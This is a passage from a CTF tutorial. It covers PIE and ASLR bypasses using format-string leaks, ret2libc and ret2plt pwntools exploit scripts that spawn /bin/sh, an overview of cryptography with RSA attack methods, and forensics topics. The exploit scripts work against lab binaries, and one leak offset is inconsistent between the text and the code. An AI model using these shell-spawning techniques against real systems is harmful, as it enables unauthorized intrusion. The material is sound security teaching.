    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Unlike last time, we don't get given a function. We'll have to leak it with format strings.

Analysis

$ ./vuln-32 

What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello

Everything's as we expect.

Exploitation

Setup

As last time, first, we set everything up.

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

PIE Leak

Now we just need a leak. Let's try a few offsets.

$ ./vuln-32 
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1

3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).

$ r2 -d -A vuln-32 

Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5

We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's leak the value and get the base address.

p.recvuntil('name?\n')
p.sendline('%3$p')

p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check

Now we just need to send the exploit payload.

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.recvuntil('message?\n')
p.sendline(payload)

print(p.clean().decode())

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

p.recvuntil('name?\n')
p.sendline('%3$p')

p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.recvuntil('message?\n')
p.sendline(payload)

print(p.clean().decode())

64-bit

Same deal, just 64-bit. Try it out :)

pie-fmtstr-64

ASLR

Address Space Layout Randomisation

Overview

ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependent on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any difference at all if you had ASLR enabled.

Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function.

Double-Checking

For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.

ASLR Bypass with Given Leak

The Source

aslr

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %lp\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of the system.

Analysis

$ ./vuln-32 
System is at: 0xf7de5f00

Yup, does what we expected.

Your address of the system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of the system and calculate the libc base from that (as we did with PIE):

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

64-bit

Try it yourself :)

aslr-64

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

Instead, you could do:

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

p.sendline(rop.chain())

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

PLT and GOT

Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality. For example, each ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that *ASLR* exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:

Why does it do that?

Well, as we said, it doesn't know where puts actually are - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and store it in the GOT.

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.

The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example, system, we can just redirect execution to its PLT entry and it will be the equivalent of calling the system directly; no need to jump into libc.

The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.

ret2plt

A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again and enable you to

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts']
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way as to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit

Summary

The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in the libc of functions you use and stores them in the GOT
- Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating the libc base

Cryptography

https://ctf101.org/cryptography/overview/

Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes that are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.

The word “cryptography” technically means the art of writing codes. When it comes to digital forensics, it’s a method you can use to understand how data is constructed for your analysis.

What is cryptography used for?

Uses in everyday software

Securing web traffic (passwords, communication, etc.)
Securing copyrighted software code

Malicious uses

Hiding malicious communication
Hiding malicious code

Topics

XOR
Cesear Cipher
Substitution Cipher
Vigenere Cipher
Hashing Functions
Block Ciphers
Stream Ciphers
RSA

XOR

Data Representation

Data can be represented in different bases, an 'A' needs to be a numerical representation of Base 2 or binary so computers can understand them

Data Representation

XOR Basics

An XOR or eXclusive OR is a bitwise operation indicated by ^ and shown by the following truth table:

A	B	A ^ B
0	0	0
0	1	1
1	0	1
1	1	0

So what XOR'ing bytes in the action 0xA0 ^ 0x2C translates to is:

1	0	1	0	0	0	0	0
0	0	1	0	1	1	0	0

1	0	0	0	1	1	0	0

0b10001100` is equivalent to `0x8C`, a cool property of XOR is that it is reversible meaning `0x8C ^ 0x2C = 0xA0` and `0x8C ^ 0xA0 = 0x2C

XOR Basics

What does this have to do with CTF?

XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:

>>> data = 'CAPTURETHEFLAG'
>>> key = 'A'
>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])
>>> encrypted
'\x02\x00\x11\x15\x14\x13\x04\x15\t\x04\x07\r\x00\x06'
>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])
>>> decrypted
'CAPTURETHEFLAG'

This can be extended using a multibyte key by iterating in parallel with the data.

Exploiting XOR Encryption

Single Byte XOR Encryption

Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.

Multibyte XOR Encryption

Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the English alphabet than others.

Substitution Cipher

A Substitution Cipher is a system of encryption where different symbols substitute a normal alphabet.

Substitution Cipher

Caesar Cipher/ROT 13

The Caesar Cipher or Caesar Shift is a cipher that uses the alphabet to encode texts.

CAESAR` encoded with a shift of 8 is `KIMAIZ` so `ABCDEFGHIJKLMNOPQRSTUVWXYZ` becomes `IJKLMNOPQRSTUVWXYZABCDEFGH

ROT13 is the same thing but a fixed shift of 13, this is a trivial cipher to bruteforce because there are only 25 shifts.

Caesar Cipher

Vigenere Cipher

A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar-shifted alphabets.

The following table can be used to encode a message:

Vigenere Square

Encryption

For example, encrypting the text SUPERSECRET with CODE would follow this process:

CODE gets padded to the length of SUPERSECRET so the key becomes CODECODECOD
For each letter in SUPERSECRET we use the table to get the Alphabet to use, in this instance row C and column S
The ciphertext's first letter then becomes U
We eventually get UISITGHGTSW

Decryption

Go to the row of the key, in this case, C
Find the letter of the cipher text in this row, in this case U
The column is the first letter of the decrypted ciphertext, so we get S
After repeating this process we get back to SUPERSECRET

Hashing Functions

Hashing functions are one-way functions that theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were considered secure are now found to have collisions or two different pieces of data which produce the same supposed unique output.

String Hashing

A string hash is a number or string generated using an algorithm that runs on text or data.

The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.

You can use command line tools or online resources such as this one. Example: $ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99 Here, “password” is hashed with different hashing algorithms:

SHA-1: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
SHA-2: 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8
MD5: 5F4DCC3B5AA765D61D8327DEB882CF99
CRC32: BBEDA74F

Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.

File Hashing

A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.

What is it used for? - File and data identification - Password/certificate storage comparison

How can we determine the hash of a file? You can use the md5sum command (or similar).

$ md5sum samplefile.txt
3b85ec9ab2984b91070128be6aae25eb samplefile.txt

Hash Collisions

A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.

What’s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer since it’s hard to get the passwords from hashes.

Password to Hash

If you bruteforce by trying every possible piece of text or data, eventually you’ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.

Two different files on the same hard drive with the same cryptographic hash can be very interesting.

“It’s now well-known that the cryptographic hash function MD5 has been broken,” said Peter Selinger of Dalhousie University. “In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.”

For example, he cited this famous pair:

Password to Hash

and

Password to Hash

Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.

Selinger said that “the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.”

Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl’s Illustrated Guide. And here’s a good article from DFI News that explores the same topic.

Block Ciphers

A Block Cipher is an algorithm that is used in conjunction with a cryptosystem to package a message into evenly distributed 'blocks' which are encrypted one at a time.

Definitions

Mode of Operation: How a block cipher is applied to an amount of data that exceeds a block's size
Initialization Vector (IV): A sequence of bytes that is used to randomize encryption even if the same plaintext is encrypted
Starting Variable (SV): Similar to the IV, except it is used during the first block to provide a random seed during encryption
Padding: Padding is used to ensure that the block sizes all line up and ensure the last block fits the block cipher
Plaintext: Unencrypted text; Data without obfuscation
Key: A secret used to encrypt plaintext
Ciphertext: Plaintext encrypted with a key

Common Block Ciphers

Mode	Formulas	Ciphertext
ECB	Yi = F(PlainTexti, Key)	Yi
CBC	Yi = PlainTexti XOR Ciphertexti-1	F(Y, key); Ciphertext0 = IV
PCBC	Yi = PlainTexti XOR (Ciphertexti-1 XOR PlainTexti-1)	F(Y, key); Ciphertext0 = IV
CFB	Yi = Ciphertexti-1	Plaintext XOR F(Y, key); Ciphertext0 = IV
OFB	Yi = F(Key, Ii-1);Y0=IV	Plaintext XOR Yi
CTR	Yi = F(Key, IV + g(i));IV = token();	Plaintext XOR Yi

Note

In this case, i represents an index over the # of blocks in the plaintext. F() and g() represent the function used to convert plaintext into ciphertext.

Electronic Codebook (ECB)

ECB is the most basic block cipher, it simply chunks up plaintext into blocks and independently encrypts those blocks, and chains them all into a ciphertext.

ECB Encryption ECB Decryption

Flaws

Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the CBC Penguin image below.

Original Image	ECB Image	Other Block Cipher Modes

Cipher Block Chaining (CBC)

CBC is an improvement upon ECB where an Initialization Vector is used to add randomness. The encrypted previous block is used as the IV for each sequential block meaning that the encryption process cannot be parallelized. CBC has been declining in popularity due to a variety of

CBC Encryption CBC Decryption

Note

Even though the encryption process cannot be parallelized, the decryption process can be parallelized. If the wrong IV is used for decryption it will only affect the first block as the decryption of all other blocks depends on the ciphertext not the plaintext.

Propagating Cipher Block Chaining (PCBC)

PCBC is a less-used cipher that modifies CBC so that decryption is also not parallelizable. It also cannot be decrypted from any point as changes made during the decryption and encryption process "propagate" throughout the blocks, meaning that both the plaintext and ciphertext are used when encrypting or decrypting as seen in the images below.

PCBC Encryption PCBC Decryption

Counter (CTR)

Note

The counter is also known as CM, integer counter mode (ICM), and segmented integer counter (SIC)

CTR mode makes the block cipher similar to a stream cipher and it functions by adding a counter with each block in combination with a nonce and key to XOR the plaintext to produce the ciphertext. Similarly, the decryption process is the same except instead of XORing the plaintext, the ciphertext is XORed. This means that the process is parallelizable for both encryption and decryption and you can begin from anywhere as the counter for any block can be deduced easily.

CTR Encryption CTR Decryption

Security Considerations

If the nonce chosen is non-random, it is important to concatenate the nonce with the counter (high 64 bits to the nonce, low 64 bits to the counter) as adding or XORing the nonce with the counter would break security as an attacker can cause a collision with the nonce and counter. An attacker with access to providing a plaintext, nonce, and counter can then decrypt a block by using the ciphertext as seen in the decryption image.

Padding Oracle Attack

A Padding Oracle Attack sounds complex but essentially means abusing a block cipher by changing the length of input and being able to determine the plaintext.

Requirements

An oracle, or program, which encrypts data using CBC
Continual use of the same key

Execution

If we have two blocks of ciphertext, C1, and C2, we can get the plaintext P2
Since we know that CBC decryption is dependent on the prior ciphertext if we change the last byte of C1 we can see if C2 has the correct padding
If it is correctly padded we know that the last byte of the plaintext
If not, we can increase our byte by one and repeat until we have a successful padding
We then repeat this for all successive bytes following C1 and if the block is 16 bytes we can expect a maximum of 4080 attempts which is trivial

Stream Ciphers

A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.

Definitions

A keystream is a sequence of pseudorandom digits that extend to the length of the plaintext to uniquely encrypt each character based on the corresponding digit in the keystream

One-Time Pads

A one-time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers to generate a random ciphertext. The advantage of the one-time pad is that it offers an immense amount of security BUT for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one-time pads have little use in modern-day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128-bit in length, to seed a pseudorandom keystream which is used to encrypt the text.

Types of Stream Ciphers

Synchronous Stream Ciphers

A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher in which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronous state cipher is in the same state, otherwise, the message cannot be decrypted.

Self-synchronizing Stream Ciphers

A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher that uses the previous N digits to compute the keystream used for the next N characters.

Note

Seems a lot like block ciphers doesn't it? That's because block cipher feedback mode (CFB) is an example of a self-synchronizing stream cipher.

Stream Cipher Vulnerabilities

Key Reuse

The key tenet of using stream ciphers securely is to NEVER repeat key use because of the commutative property of XOR. If C1 and C2 have been XOR'd with a key K, retrieving that key K is trivial because C1 XOR C2 = P1 XOR P2, and having an English language-based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the English language.

Bit-flipping Attack

Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronous stream cipher.

RSA

RSA, which is an abbreviation of the author's name (Rivest–Shamir–Adleman), is a cryptosystem that allows for asymmetric encryption. Asymmetric cryptosystems are also commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, a private key can be used to decrypt the data.

Definitions

The Public Key is made up of (n, e)
The Private Key is made up of (n, d)
The message is represented as m and is converted into a number
The encrypted message or ciphertext is represented by c
p and q are prime numbers which make up n
e is the public exponent
n is the modulus and its length in bits is the bit length (i.e. 1024 bit RSA)
d is the private exponent
The totient λ(n) is used to compute d and is equal to the lcm(p-1, q-1), another definition for λ(n) is that λ(pq) = lcm(λ(p), λ(q))

What makes RSA viable?

If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:

(m^e)d ≡ m (mod n)

Note

The triple equals sign in this case refers to modular congruence which in this case means that there exists an integer k such that (m^e)d = kn + m

RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.

Implementation

RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption

Key Generation

We are going to follow Wikipedia's small numbers example to make this idea a bit easier to understand.

Note

In This example, we are using Carmichael's totient function where λ(n) = lcm(λ(p), λ(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is φ(n) = (p − 1)(q − 1)

Choose two prime numbers such as:
- p = 61 and q = 53
Find n:
- n = pq = 3233
Calculate λ(n) = lcm(p-1, q-1)
- λ(3233) = lcm(60, 52) = 780
Choose a public exponent such that 1 < e < λ(n) and is coprime (not a factor of) λ(n). The standard in most cases is 65537, but we will be using:
- e = 17
Calculate d as the modular multiplicative inverse or in English find d such that: de mod λ(n) = 1
- d * 17 mod 780 = 1
- d = 413

Now we have a public key of (3233, 17) and a private key of (3233, 413)

Encryption

With the public key, m can be encrypted trivially

The ciphertext is equal to m**e mod n or:

c = m^17 mod 3233

Decryption

With the private key, m can be decrypted trivially as well

The plaintext is equal to c**d mod n or:

m = c^413 mod 3233

Exploitation

From the RsaCtfTool README

Attacks:

Weak public key factorization

Wiener's attack

Hastad's attack (Small public exponent attack)

Small q (q < 100,000)

Common factor between ciphertext and modulus attack

Fermat's factorization for close p and q

Gimmicky Primes method

Past CTF Primes method

Self-Initializing Quadratic Sieve (SIQS) using Yafu

Common factor attacks across multiple keys

Small fractions method when p/q is close to a small fraction

Boneh Durfee Method when the private exponent d is too small compared to the modulus (i.e d < n^0.292)

Elliptic Curve Method

Pollards p-1 for relatively smooth numbers

Mersenne primes factorization

Forensics

https://ctf101.org/forensics

Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data that is seemingly deleted, not stored, or worse, covertly recorded.

An important part of Forensics is having the right tools, as well as being familiar with the following topics:

File Formats
EXIF data
Wireshark & PCAPs
- What is Wireshark
Steganography
Disk Imaging

File Formats

File Extensions are not the sole way to identify the type of a file, files have certain leading bytes called file signatures which allow programs to parse the data consistently. Files can also contain additional "hidden" data called metadata which can be useful in finding out information about the context of a file's data.

File Signatures

File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally, they’re 2-4 bytes long, found at the beginning of a file.

What is it used for?

Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type to open properly.

How do you find the file signature?

You need to be able to look at the binary data that constitutes the file you’re examining. To do this, you’ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler’s.

Example

File A

The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600 or in ASCII ˇÿˇ‡ JFIF where \x00 and \x10 lack symbols.

Searching in Gary Kessler’s database shows that this file signature belongs to a JPEG/JFIF graphics file, exactly what we suspect.

Metadata

Metadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number, and album.

What kind of file metadata is useful?

Potentially, any file metadata you can find could be useful.

How do I find it?

EXIF Data is metadata attached to photos which can include location, time, and device information.

One of our favorite tools is ExifTool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)

Run command line: exiftool(-k).exe [filename] and you should see something like this:

Exiftool

Example

Let's take a look at File A's metadata with ExifTool:

File type

Metadata 1

Image description

Metadata 2

Make and camera info

Metadata 3

GPS Latitude/Longitude

Metadata 4

Timestamps

Timestamps are data that indicate the time of certain events (MAC): - Modification – when a file was modified - Access – when a file or entries were read or accessed - Creation – when files or entries were created

Types of timestamps

Modified
Accessed
Created
Date Changed (MFT)
Filename Date Created (MFT)
Filename Date Modified (MFT)
Filename Date Accessed (MFT)
INDX Entry Date Created
INDX Entry Date Modified
INDX Entry Date Accessed
INDX Entry Date Changed

Why do we care?

Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.

Timeline Patterns

There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.

Timeline 1 Timeline 2 Timeline 3 Timeline 4 Timeline 5

Examples

We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?

Files A, B, C, D

By using time stamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileB, and fileC was created by modifying fileA differently.

Follow along as we demonstrate.

We’ll start by analyzing images in AccessData FTK Imager, where there’s a Properties window that shows you some information about the file or folder you’ve selected.

Timestamp 1 Timestamp 2 Timestamp 3 Timestamp 4

Here are the extracted MAC times for fileA, fileB, fileC, and fileD: Note, AccessData FTK Imager assumes that the file times on the drive are in UTC (Universal Coordinated Time). I subtracted four hours since the USB was set up in Eastern Standard Time. This isn’t necessary, but it helps me understand the times a bit better.

Timestamp 5

Highlight timestamps that are the same, if timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.

Timestamp 6 Timestamp 7 Timestamp 8 Timestamp 9 Timestamp 10 Timestamp 11 Timestamp 12 Timestamp 13 Timestamp 14 Timestamp 15

Identify timestamp patterns.

Timestamp 16

Wireshark

Wireshark is a network protocol analyzer that is often used in CTF challenges to look at recorded network traffic. Wireshark uses a file type called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.

Interface

Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.

Wirshark Start Screen

The network traffic displayed initially shows the packets in the order in which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.

PCAP Screen

To apply filters, simply enter the constraining factor, for example, 'http', in the display filter bar.

PCAP HTTP Filter

Filters can be chained together using the '&&' notation. To filter by IP, ensure a double equals '==' is used.

PCAP HTTP IP Filter

The most pertinent part of a packet is its data payload and protocol information.

HTTP TCP Info

Decrypting SSL Traffic

By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.

High-Level SSL Handshake Overview

For a network session to be encrypted properly, the client and server must share a common secret that they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:

The client sends a list of available cipher suites it can use along with a random set of bytes referred to as client_random
The server sends back the cipher suite that will be used, such as TLS_DHE_RSA_WITH_AES_128_CBC_SHA, along with a random set of bytes referred to as server_random
The client generates a pre-master secret, encrypts it, then sends it to the server.
The server and client then generate a common master secret using the selected cipher suite
The client and server begin communicating using this common secret

Decryption Requirements

There are several ways to be able to decrypt traffic.

If you have the client and server random values and the pre-master secret, the master secret can be generated and used to decrypt the traffic
If you have the master secret, traffic can be decrypted easily
If the cipher-suite uses RSA, you can factor n in the key to break the encryption on the encrypted pre-master secret and generate the master secret with the client and server randoms

Wireshark SSL Preferences

Steganography

Steganography is the practice of hiding data in plain sight. Steganography is often embedded in images or audio.

You could send a picture of a cat to a friend and hide text inside. Looking at the image, there’s nothing to make anyone think there’s a message hidden inside it.

Steg with text

You could also hide a second image inside the first.

Steg with an Image

Steganography Detection

So we can hide text and an image, how do we find out if there is hidden data?

Group of images

FileA and FileD appear the same, but they’re different. Also, FileD was modified after it was copied, so it’s possible there might be steganography in it.

FileB and FileC don’t appear to have been modified after being created. That doesn’t rule out the possibility that there’s steganography in them, but you’re more likely to find it in fileD. This brings up two questions:

Can we determine that there is steganography in fileD?
If there is, what was hidden in it?

LSB Steganography

Files are made of bytes. Each byte is composed of eight bits.

Steganography Process Step 1

Changing the least-significant bit (LSB) doesn’t change the value very much.

Steganography Process Step 2

So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.

LSB Steganography in Images

LSB Stegonagraphy or Least Significant Bit Stegonagraphy is a method of steganography where data is recorded in the lowest bit of a byte.

Say an image has a pixel with an RGB value of (255, 255, 255), the bits of those RGB values will look like

1	1	1	1	1	1	1	1

By modifying the lowest, or least significant, bit, we can use the 1-bit space across every RGB value for every pixel to construct a message.

1	1	1	1	1	1	1	0

The reason steganography is hard to detect by sight is that a 1-bit difference in color is insignificant as seen below.

1 Bit Difference

Example

Let’s say we have an image, and part of it contains the following binary:

Steganography Process Step 3

And let’s say we want to hide the character y inside.

First, we need to convert the hidden message to binary.

Steganography Process Step 4

Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.

Steganography Process Step 5

And again:

Steganography Process Step 6

And again:

Steganography Process Step 7

And again:

Steganography Process Step 8

And again:

Steganography Process Step 9

And again:

Steganography Process Step 10

And again:

Steganography Process Step 11

And once more:

Steganography Process Step 12

Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you’ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)

What other types of steganography are there?

Steganography is hard for the defense side because there’s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography.

Disk Imaging

A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It’s a bit-by-bit or bitstream file that’s an exact, unaltered copy of the media being duplicated.

Wikipedia said that the most straightforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. “This can be a time-consuming process, especially for disks with a large capacity,” Wikipedia said.

